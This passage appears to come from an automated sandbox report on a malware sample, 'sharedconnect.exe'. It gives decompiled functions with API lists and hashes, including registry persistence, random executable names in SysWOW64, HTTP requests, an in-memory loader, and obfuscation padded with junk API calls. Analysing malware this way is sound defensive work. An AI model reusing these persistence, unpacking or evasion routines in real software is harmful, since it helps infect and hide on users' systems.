				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				lstrcpyW(__ecx, "C:\Windows\SysWOW64");
				_t23 = lstrlenW(_t19);
				_t19[_t23] = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L00CD2040( &(_t19[_t24]), _t28);
				_t25 = _t24 + _t28;
				_t19[_t25] = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x00cd8223
0x00cd822b
0x00cd8238
0x00cd823f
0x00cd8243
0x00cd8252
0x00cd8257
0x00cd825c
0x00cd8260
0x00cd8267
0x00cd826f
0x00cd8277

APIs

lstrcpyW.KERNEL32(?,C:\Windows\SysWOW64), ref: 00CD822B
lstrlenW.KERNEL32(?,?,C:\Windows\SysWOW64), ref: 00CD8232
GetTickCount.KERNEL32 ref: 00CD8244

Strings

x, xrefs: 00CD8267
C:\Windows\SysWOW64, xrefs: 00CD8225

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CountTicklstrcpylstrlen
String ID: C:\Windows\SysWOW64$x
API String ID: 974621299-2963027263
Opcode ID: ff9f50abdb03b47c56ea3a11fad1aa952142779f988b5a5ec40d534ae868da29
Instruction ID: f8af82eb8bb6d975dbab6a06a71b67dc0cc7b87921ff4cace616e00f66e1ae43
Opcode Fuzzy Hash: ff9f50abdb03b47c56ea3a11fad1aa952142779f988b5a5ec40d534ae868da29
Instruction Fuzzy Hash: EDF0E5B7605214ABD7105FA0DCC474A37A6EF44352B059076ED05DB316DF75C80187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD11A3, Relevance: 7.5, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

_snwprintf.NTDLL ref: 00CD11A3
CreateEventW.KERNEL32(?,00000001,?,?), ref: 00CD11B7
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 00CD11C4
CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 00CD11CB
CloseHandle.KERNEL32(00000000), ref: 00CD11DA

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID:
API String ID: 2675716504-0
Opcode ID: 1912f3fe6535bac141108f6078e29e52325e467e2dfae72c260db381416a2f27
Instruction ID: c768dcb168ea90d88cc632c7b5140fc213bb229d056b6d1a6033c40ed5f3af2c
Opcode Fuzzy Hash: 1912f3fe6535bac141108f6078e29e52325e467e2dfae72c260db381416a2f27
Instruction Fuzzy Hash: 83E04F32812210ABC7221B249C4CBEE3B78EF44711F0B0046FD15A2210DB358A41CA52

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1E71, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CD1E71(WCHAR* __esi) {
				int _t11;
				void* _t17;
				void* _t21;

				E00CD1870(_t17);
				 *(_t21 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t21 + 8), 0, 0, _t21 - 0x58, _t21 - 0x10);
				if(_t11 == 0) {
					goto 0xe305e9;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t21 + 0xc)) == 0) {
						CloseHandle( *(_t21 - 0x10));
						CloseHandle( *(_t21 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x00cd1e71
0x00cd1e79
0x00cd1e95
0x00cd1e9d
0x00cd1ed5
0x00cd1eda
0x00cd1edb
0x00cd1e9f
0x00cd1ea4
0x00cd1ebc
0x00cd1ec5
0x00cd1ed4
0x00cd1ea6
0x00cd1ea6
0x00cd1eab
0x00cd1eb8
0x00cd1eb8
0x00cd1ea4

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00CD1E95
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00CD1EBC
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00CD1EC5

Strings

D, xrefs: 00CD1E79

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 56dc998367f623a5ebf891c16a9715265cd93b0505790dc0b56538dcfaded19b
Instruction ID: fba971713a33818cc73c23a7a5fc8d11aec1a8af46ad69ecb09c7c2b02bc1a09
Opcode Fuzzy Hash: 56dc998367f623a5ebf891c16a9715265cd93b0505790dc0b56538dcfaded19b
Instruction Fuzzy Hash: 6FF03071A50249BBEB215F94EC05BED7B78EB44700F104153FE14A92D0DBB59950D794

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8500, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CD8500(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				 *0xcda67c(0, 0x23, 0, 0, __ecx);
				_t23 = lstrlenW(__ecx);
				 *((short*)(_t19 + _t23 * 2)) = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L00CD2040(_t19 + _t24 * 2, _t28);
				_t25 = _t24 + _t28;
				 *((intOrPtr*)(_t19 + _t25 * 2)) = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x00cd8503
0x00cd850e
0x00cd851b
0x00cd8522
0x00cd8526
0x00cd8535
0x00cd853a
0x00cd853f
0x00cd8543
0x00cd854a
0x00cd8552
0x00cd855a

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 00CD850E
lstrlenW.KERNEL32 ref: 00CD8515
GetTickCount.KERNEL32 ref: 00CD8527

Strings

x, xrefs: 00CD854A

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CountFolderPathTicklstrlen
String ID: x
API String ID: 2993136144-2363233923
Opcode ID: b14db0cbcb505e5900b4c2b3c04a2513ea6188142b2dc25dbaf8eb03046a6134
Instruction ID: 95aac98cffca564ac8d181bf5c1eac37fbf42d4849edeaba3d9186a3c6b84f1d
Opcode Fuzzy Hash: b14db0cbcb505e5900b4c2b3c04a2513ea6188142b2dc25dbaf8eb03046a6134
Instruction Fuzzy Hash: D4F020B3605304ABE7201FA0DC88B0A37A5EF44352F058076FA09EF292DBB5C80187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD849B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
registryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00CD849B(signed int __esi) {
				long _t6;
				void* _t14;

				_t6 = RegCreateKeyExW();
				if(_t6 == 0) {
					RegSetValueExW( *(_t14 - 4), "sharedconnect", 0, 1, _t14 - 0x274, 2 + __esi * 2);
					_t6 = RegCloseKey( *(_t14 - 4));
				}
				return _t6;
			}

0x00cd849b
0x00cd84a3
0x00cd84c0
0x00cd84c9
0x00cd84c9
0x00cd84d5

APIs

RegCreateKeyExW.ADVAPI32 ref: 00CD849B
RegSetValueExW.ADVAPI32(?,sharedconnect,00000000,00000001,?,00000000), ref: 00CD84C0
RegCloseKey.ADVAPI32(?), ref: 00CD84C9

Strings

sharedconnect, xrefs: 00CD84B8

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: sharedconnect
API String ID: 1818849710-3993246888
Opcode ID: 21958cef317211e8e6116194fa8657796d49c9a4f470cb4f0bbf4b6459e3f982
Instruction ID: cd31e759e0e9a254f29bae07bee99a06195ec98893f8939e27dcfc3f01c28ac4
Opcode Fuzzy Hash: 21958cef317211e8e6116194fa8657796d49c9a4f470cb4f0bbf4b6459e3f982
Instruction Fuzzy Hash: 51E08C32600108EBDB208B90ED4EB9C7778EB44301F4000B3F609D0060EB768A009A91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8648, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CD8648(void* __ecx) {
				int _t10;
				void* _t16;

				 *0xcda7cc();
				_push(_t16 - 0x20);
				_push( *(_t16 - 4));
				if(L00CD1EE0(_t16 - 0x430) != 0) {
					CloseHandle( *(_t16 - 0x20));
					CloseHandle( *(_t16 - 0x1c));
				}
				_t10 = CloseHandle( *(_t16 - 4));
				return _t10;
			}

0x00cd8648
0x00cd865a
0x00cd865b
0x00cd8669
0x00cd866e
0x00cd8677
0x00cd8677
0x00cd8680
0x00cd868a

APIs

_snwprintf.NTDLL ref: 00CD8648
CloseHandle.KERNEL32(?), ref: 00CD866E
CloseHandle.KERNEL32(?), ref: 00CD8677
CloseHandle.KERNEL32(?), ref: 00CD8680

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 83eb46f51168d37e5b1558cfbb1e18911ab56010b053af03df0b310bf5101f80
Instruction ID: 57413b678fb62c080e2fba5bc005e6e789c2fec6c275e05bab601f33af8e529d
Opcode Fuzzy Hash: 83eb46f51168d37e5b1558cfbb1e18911ab56010b053af03df0b310bf5101f80
Instruction Fuzzy Hash: 99E0BF72811219EBCF11AFE4ED09BEDBB39FF08305F054592F905A1131DB368A24DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD17FA, Relevance: 6.0, APIs: 4, Instructions: 20
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CD17FA(void* __edx, void* __esi) {
				void* _t11;
				void* _t13;
				void* _t20;
				void* _t22;
				intOrPtr _t23;
				void* _t25;

				_t22 = __esi;
				if(HttpSendRequestW(??, ??, ??, ??, ??) != 0) {
					_t11 = L00CD1650(_t5, __esi, __edx);
					_t29 = _t11 - 0xc8;
					if(_t11 == 0xc8) {
						 *((intOrPtr*)(_t25 - 4)) = L00CD16D0(__esi,  *((intOrPtr*)(_t25 + 0x1c)), _t29);
					}
				}
				InternetCloseHandle(_t22);
				InternetCloseHandle(_t13);
				_t23 =  *((intOrPtr*)(_t25 - 4));
				InternetCloseHandle(_t20);
				E00CD18C0( *((intOrPtr*)(_t25 - 0xc)));
				return _t23;
			}

0x00cd17fa
0x00cd1802
0x00cd180b
0x00cd1810
0x00cd1815
0x00cd1821
0x00cd1821
0x00cd1815
0x00cd1825
0x00cd182c
0x00cd1832
0x00cd1836
0x00cd183f
0x00cd184c

APIs

HttpSendRequestW.WININET ref: 00CD17FA
InternetCloseHandle.WININET ref: 00CD1825
InternetCloseHandle.WININET(00000000), ref: 00CD182C
InternetCloseHandle.WININET ref: 00CD1836

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet$HttpRequestSend
String ID:
API String ID: 2722702071-0
Opcode ID: 05d411e58444963e01d32f4c21e35bb5c663ee1cc088c887e453db5710fa91a9
Instruction ID: 9b07bd38ef18a1de6515ed2e96e059435a8e085f0565248f52a62b25cc9bbc88
Opcode Fuzzy Hash: 05d411e58444963e01d32f4c21e35bb5c663ee1cc088c887e453db5710fa91a9
Instruction Fuzzy Hash: 6FE01276701014A787009BA5FD487ADB7F8EA452527184067FE06E22A1CB295902B7B7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sharedconnect.exe PID: 2932 Parent PID: 560 sharedconnect.exeCOMMON

Execution Graph

Execution Coverage:	37.3%
Dynamic/Decrypted Code Coverage:	47.8%
Signature Coverage:	0%
Total number of Nodes:	23
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 003B14C9, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 259
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E003B14C9() {
				void* _v16;
				void* _v36;
				CHAR* _v40;
				signed int _v44;
				short _v46;
				intOrPtr _v48;
				intOrPtr _v52;
				long _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v74;
				signed int _v76;
				signed int _v80;
				void* _v84;
				char* _v88;
				void** _v96;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v332;
				void* _v344;
				intOrPtr _v348;
				struct _ICONINFO _v368;
				char _v610;
				intOrPtr _v616;
				intOrPtr _v644;
				void* _v652;
				char _v656;
				intOrPtr _v660;
				intOrPtr _v688;
				char _v692;
				void* _v696;
				intOrPtr _v700;
				char* _v704;
				intOrPtr* _v708;
				signed int _v712;
				intOrPtr _v716;
				void* _v720;
				CHAR* _v724;
				signed int _v728;
				intOrPtr _v732;
				signed int _v736;
				intOrPtr _v740;
				signed int _v744;
				long _v748;
				intOrPtr _v752;
				int _v756;
				int _v760;
				struct _ICONINFO* _v764;
				struct HICON__* _v768;
				long _v785;
				intOrPtr _v792;
				signed int _v793;
				short _v794;
				intOrPtr _v796;
				void* _v808;
				signed int _v812;
				intOrPtr _v820;
				signed int _v824;
				void* _v828;
				intOrPtr _v832;
				long _v833;
				long _v834;
				intOrPtr _v836;
				int _v844;
				intOrPtr _v864;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _t144;
				int _t145;
				int _t146;
				intOrPtr _t147;
				int _t148;
				struct HICON__* _t150;
				void* _t151;
				struct HICON__* _t156;
				void* _t161;
				intOrPtr _t163;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t172;
				intOrPtr _t173;
				void* _t176;
				signed int _t177;
				intOrPtr _t183;
				CHAR* _t186;
				long _t188;
				signed int _t189;
				signed int _t190;
				CHAR* _t192;
				intOrPtr _t202;
				void* _t204;
				void* _t227;
				signed int _t240;
				signed int _t252;
				void* _t255;

				_v36 = 0;
				_v40 = 0x440555f2;
				_v46 = 0xb400;
				_v52 = 0x76126aff;
				_t192 = _v40;
				_t240 = _v44;
				asm("sbb edi, edx");
				_v700 = 0x761272f5;
				_v44 = _t240 + 0x14c58f1d;
				_v60 = 0;
				_v64 = 0x8e773d56 - _t192;
				_v616 = 0x237b1133;
				_v696 = 0;
				_t186 =  &_v332;
				_v704 =  &_v610;
				_v708 = wsprintfA;
				_v712 = _t240;
				_v716 = _t192;
				_v720 = _v36;
				_v724 = _t186;
				_v728 =  &_v696;
				_t144 =  *_v708(_t186, "%S", _v704);
				_t255 = (_t252 & 0xfffffff8) - 0x348 + 0xc;
				_v732 = _t144;
				_t145 = GetBinaryTypeA(_v724, _v728); // executed
				_v44 =  !_v712;
				_v736 = _t145;
				_t146 = ReleaseCapture();
				_v740 = _t146;
				_t147 =  *__imp__GetGUIThreadInfo(0x5fa,  &_v692);
				_v84 = 0;
				_v752 = _t147;
				_t148 = DuplicateHandle(0, 0, 0,  &_v84, _v60 + 0x89ed98db, 0x736, _v60 + 0x89ed98db); // executed
				_v36 = _v728;
				_v40 = _v724;
				_t188 = _v708 - _v60;
				_v756 = _t148;
				_v760 = LockFile(0, _t188, _t188, _v60 ^ 0x76126cc0, 0x1ac);
				_v764 =  &(_v368.xHotspot);
				_t150 = CreateIconIndirect( &(_v368.xHotspot));
				_v652 = 0;
				_v768 = _t150;
				goto L17;
				do {
					while(1) {
						L17:
						_t151 = _v652;
						_v344 = _t151;
						_t202 = _t151 - 1;
						_v828 = _t151;
						_v832 = _t202;
						if(_t202 == 0) {
							goto L21;
						}
						_t183 = _v828 - 5;
						_v836 = _t183;
						if(_t183 == 0) {
							L1:
							_v794 = GlobalDeleteAtom(0x3a);
						} else {
						}
						L16:
						_v824 = _v348 + 1;
						_t156 = CreateIconIndirect( &_v368);
						_t204 = _v828;
						_v660 = _t204;
						_v44 = _v736;
						_v48 = _v732;
						_v60 = _v728 ^ 0x4ebe5432;
						_v832 = _t156;
						if(_t204 > 0x73) {
							_v88 =  &_v656;
							_v60 = _v728 + _v728;
							_t189 = _t188 & 0xffffff00 | __eflags > 0x00000000;
							__eflags = _v76;
							_t75 = _v76 != 0;
							__eflags = _t75;
							_t188 = _t189 & 0xffffff00 | _t75;
							_v785 = _t188;
							_v792 = _v80 - 0x287c73b9;
							_v793 = _t188;
							if(_t75 != 0) {
								_v793 = _v785;
							}
							__eflags = _v793;
							if(__eflags != 0) {
								_t161 = _v80;
								_t255 = _t255 - 0xc;
								_t227 = _t255;
								 *((intOrPtr*)(_t227 + 8)) =  &_v656;
								 *(_t227 + 4) = "Card4G";
								_v808 = _t161;
								_v812 = _v76;
								L003C784C(); // executed
								_t190 = _t188 & 0xffffff00 | __eflags > 0x00000000;
								__eflags = _v824;
								_t97 = _v824 != 0;
								__eflags = _t97;
								_t188 = _t190 & 0xffffff00 | _t97;
								_v828 = _t161;
								_v832 = _v820 - 0x792c87a;
								_v833 = _t188;
								_v834 = _t188;
								if(_t97 != 0) {
									_v834 = _v833;
								}
								__eflags = _v834;
								if(__eflags != 0) {
									_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t163 + 0xa4)) - 6;
									if( *((intOrPtr*)(_t163 + 0xa4)) < 6) {
										break;
									} else {
										_v796 = 0;
										_t172 = L003B1050();
										_t173 =  *((intOrPtr*)(_t172 + 0x3c));
										_t188 = _v748;
										_v56 = _t188;
										_v60 = _v744;
										__eflags =  *((intOrPtr*)(_t172 + _t173)) - (_v80 ^ 0x76122faf);
										_t176 =  ==  ? _t172 + _t173 : _v796;
										__eflags =  *((intOrPtr*)(_t176 + 0x48)) - (_v74 ^ 0x0000b405);
										if( *((intOrPtr*)(_t176 + 0x48)) > (_v74 ^ 0x0000b405)) {
											_t177 = L003B109B(); // executed
											_v812 = _t177;
										} else {
											break;
										}
									}
								} else {
									goto L1;
								}
							} else {
								break;
							}
							L24:
							_v896 = _v116;
							return 1;
						} else {
							continue;
						}
						L21:
						_v844 = CancelIo(0);
						goto L16;
					}
					_v96 =  &_v652;
					_v864 = _v644;
					_t166 =  *__imp__AddUsersToEncryptedFile(L"Swb4Ci$@pjWqJ",  &_v652);
					_v876 = _t166;
					_t167 =  *__imp__FlsGetValue(1);
					_v884 = _t167;
					_t168 =  *__imp__FlsFree(0x14a6f8);
					_v688 = 0x2e4de8af;
					__eflags = _v880 - 0x56f45d1e;
					_v892 = _t168;
				} while (__eflags >= 0);
				_v832 = _v112;
				goto L24;
			}

APIs

GetBinaryTypeA.KERNEL32(?,?), ref: 003B15E3
DuplicateHandle.KERNELBASE(00000000,00000000,00000000,?,?,00000736,?), ref: 003B1654
LockFile.KERNEL32(00000000,?,?,?,000001AC), ref: 003B16A6
CreateIconIndirect.USER32 ref: 003B16C5

Strings

Swb4Ci$@pjWqJ, xrefs: 003B1926

Memory Dump Source

Source File: 00000006.00000002.402418647.00000000003B1000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000006.00000002.402392580.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402437277.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402465144.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402477227.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402489648.00000000003C3000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402507015.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402524263.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.402555487.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402567651.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402616947.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402634374.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402646909.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402665960.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b0000_sharedconnect.jbxd

Similarity

API ID: BinaryCreateDuplicateFileHandleIconIndirectLockType
String ID: Swb4Ci$@pjWqJ
API String ID: 3494283109-4206937320
Opcode ID: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction ID: 3f6a16f0f9272ec27de765e3af809d54d91353e383327e36e7414797e0fa7b63
Opcode Fuzzy Hash: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction Fuzzy Hash: 7BC1F375A183808FC336CF69C490B9BBBE9BFC8304F54891EE58D97750DA70AA05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00772631, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00772631(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v72;
				long _v76;
				intOrPtr _v80;
				void* _v84;
				char* _v88;
				DWORD* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				int _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				int _v168;
				intOrPtr _v172;
				char _v176;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t129;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t181;
				unsigned int _t183;
				intOrPtr _t188;
				void* _t199;
				intOrPtr _t203;

				_t98 = _a4;
				_v76 = 0;
				_v72 = 1;
				asm("movaps xmm0, [0x774000]");
				asm("movups [ebp-0x34], xmm0");
				_v80 = _t98;
				_t99 =  *((intOrPtr*)(_t98 + 0x30));
				_v176 = _t99;
				_v84 = _t99;
				_v172 = _v80;
				_v88 =  &_v72;
				_v92 =  &_v76;
				_v96 =  *((intOrPtr*)(_t98 + 0x20));
				_v100 =  *((intOrPtr*)(_t98 + 0x34));
				_v104 = _t98 + 0x30;
				E007723BE(); // executed
				E007718EE(_v84);
				_t203 = _t199 - 8 + 8 - 4 + 4;
				_t162 = _v84;
				_t188 =  *((intOrPtr*)(_t162 + 0x3c));
				_v108 = _t162 + _t188;
				_v112 = _v84 + 0x3c;
				_v116 = 0x18;
				if(_t188 + 0xffffffc0 <= 0xfc0) {
					_t159 = _v108;
					_t132 =  ==  ? _t159 + 0x18 : 0x18;
					_v116 =  ==  ? _t159 + 0x18 : 0x18;
				}
				_v120 = _v116;
				if(_v100 == 0) {
					L4:
					_v132 =  *_v104;
					_v136 = 0;
					do {
						_t107 = _v136;
						 *((char*)(_v132 + _t107)) =  *((intOrPtr*)(_v84 + _t107));
						_t108 = _t107 + 1;
						_v136 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v84 +  *_v112 : 0;
					 *((intOrPtr*)(( ==  ? _v84 +  *_v112 : 0) + 0x34)) =  *_v104;
					_t113 = VirtualProtect(_v84, 0x400, 2,  &_v76); // executed
					_t181 = _v80;
					_v40 =  *((intOrPtr*)(_t181 + 0x60));
					_v36 =  *((intOrPtr*)(_t181 + 0x64));
					_v32 =  *((intOrPtr*)(_t181 + 0x68));
					_v28 =  *((intOrPtr*)(_t181 + 0x5c));
					_v24 =  *((intOrPtr*)(_t181 + 0x58));
					_v20 = _v84 +  *((intOrPtr*)(_t181 + 0x38));
					 *((intOrPtr*)(_t203 - 0xc)) = _t181;
					_v176 = 0;
					_v172 = 0x6c;
					_v140 = _t113;
					_v144 = 0;
					_v148 = 0x6c;
					E0077104C();
					_t203 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t176 =  ==  ? _v108 : 0;
					_v124 = ( *(( ==  ? _v108 : 0) + 0x14) & 0x0000ffff) + _v120;
					_v128 = 0;
					while(1) {
						_t153 = _v124;
						_t183 =  *(_t153 + 0x24);
						_v152 = _v128;
						_v156 = _t183 >> 0x0000001e & 0x00000001;
						_v160 = _t183 >> 0x1f;
						_v164 = _t153;
						_t129 = VirtualProtect(_v84 +  *((intOrPtr*)(_t153 + 0xc)),  *(_t153 + 8),  *( &_v72 + (_v156 << 4) + (_v160 << 3) + ((_t183 >> 0x0000001d & 0x00000001) << 2)),  &_v76); // executed
						_t155 = _v152 + 1;
						_v168 = _t129;
						_v124 = _v164 + 0x28;
						_v128 = _t155;
						if(_t155 == _v100) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x0077263d
0x00772646
0x00772653
0x0077265a
0x00772661
0x0077266a
0x0077266d
0x00772673
0x00772676
0x0077267c
0x00772680
0x00772683
0x00772686
0x00772689
0x0077268c
0x0077268f
0x007726a0
0x007726a5
0x007726b3
0x007726b6
0x007726c4
0x007726c7
0x007726ca
0x007726cd
0x007726d4
0x007726e2
0x007726e5
0x007726e5
0x007726f1
0x007726f4
0x0077271c
0x00772723
0x00772726
0x0077272c
0x0077272c
0x0077273b
0x0077273e
0x00772746
0x00772746
0x00772769
0x0077276c
0x0077277e
0x0077278a
0x00772793
0x00772799
0x0077279f
0x007727a5
0x007727ab
0x007727ae
0x007727b4
0x007727b7
0x007727bf
0x007727c7
0x007727cd
0x007727d3
0x007727d9
0x007727ef
0x007727f5
0x007726f6
0x00772705
0x00772711
0x00772714
0x00772802
0x00772805
0x00772811
0x00772817
0x00772825
0x00772836
0x00772862
0x00772868
0x00772870
0x00772881
0x00772887
0x0077288a
0x0077288d
0x00000000
0x00000000
0x00772893
0x00000000
0x00772802

APIs

Part of subcall function 007723BE: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 007723F6

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 0077277E
VirtualProtect.KERNELBASE(?,?,00000001,00000000), ref: 00772868

Strings

l, xrefs: 007727BF

Memory Dump Source

Source File: 00000006.00000002.402827778.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_770000_sharedconnect.jbxd

Similarity

